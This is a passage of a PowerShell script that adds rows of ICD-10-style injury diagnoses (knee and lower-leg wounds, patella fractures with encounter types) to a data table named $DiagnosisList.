unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified knee","Puncture wound with foreign body, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right knee","Open bite, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right knee","Open bite, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right knee","Open bite, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left knee","Open bite, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left knee","Open bite, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left knee","Open bite, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified knee","Open bite, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified knee","Open bite, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified knee","Open bite, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right lower leg","Unspecified open wound, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right lower leg","Unspecified open wound, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, right lower leg","Unspecified open wound, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left lower leg","Unspecified open wound, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left lower leg","Unspecified open wound, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, left lower leg","Unspecified open wound, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified lower leg","Unspecified open wound, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified lower leg","Unspecified open wound, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound, unspecified lower leg","Unspecified open wound, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right lower leg","Laceration without foreign body, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right lower leg","Laceration without foreign body, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, right lower leg","Laceration without foreign body, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left lower leg","Laceration without foreign body, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left lower leg","Laceration without foreign body, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, left lower leg","Laceration without foreign body, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified lower leg","Laceration without foreign body, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified lower leg","Laceration without foreign body, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body, unspecified lower leg","Laceration without foreign body, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right lower leg","Laceration with foreign body, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right lower leg","Laceration with foreign body, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, right lower leg","Laceration with foreign body, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left lower leg","Laceration with foreign body, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left lower leg","Laceration with foreign body, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, left lower leg","Laceration with foreign body, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified lower leg","Laceration with foreign body, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified lower leg","Laceration with foreign body, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body, unspecified lower leg","Laceration with foreign body, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right lower leg","Puncture wound without foreign body, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right lower leg","Puncture wound without foreign body, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, right lower leg","Puncture wound without foreign body, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left lower leg","Puncture wound without foreign body, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left lower leg","Puncture wound without foreign body, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, left lower leg","Puncture wound without foreign body, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified lower leg","Puncture wound without foreign body, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified lower leg","Puncture wound without foreign body, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body, unspecified lower leg","Puncture wound without foreign body, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right lower leg","Puncture wound with foreign body, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right lower leg","Puncture wound with foreign body, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, right lower leg","Puncture wound with foreign body, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left lower leg","Puncture wound with foreign body, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left lower leg","Puncture wound with foreign body, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, left lower leg","Puncture wound with foreign body, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified lower leg","Puncture wound with foreign body, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified lower leg","Puncture wound with foreign body, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body, unspecified lower leg","Puncture wound with foreign body, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right lower leg","Open bite, right lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right lower leg","Open bite, right lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right lower leg","Open bite, right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left lower leg","Open bite, left lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left lower leg","Open bite, left lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left lower leg","Open bite, left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified lower leg","Open bite, unspecified lower leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified lower leg","Open bite, unspecified lower leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified lower leg","Open bite, unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right patella","Unspecified fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left patella","Unspecified fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified patella","Unspecified fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of right patella","Displaced osteochondral fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of left patella","Displaced osteochondral fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced osteochondral fracture of unspecified patella","Displaced osteochondral fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of right patella","Nondisplaced osteochondral fracture of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of left patella","Nondisplaced osteochondral fracture of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced osteochondral fracture of unspecified patella","Nondisplaced osteochondral fracture of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal fracture of right patella, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced longitudinal fracture of right patella","Displaced longitudinal 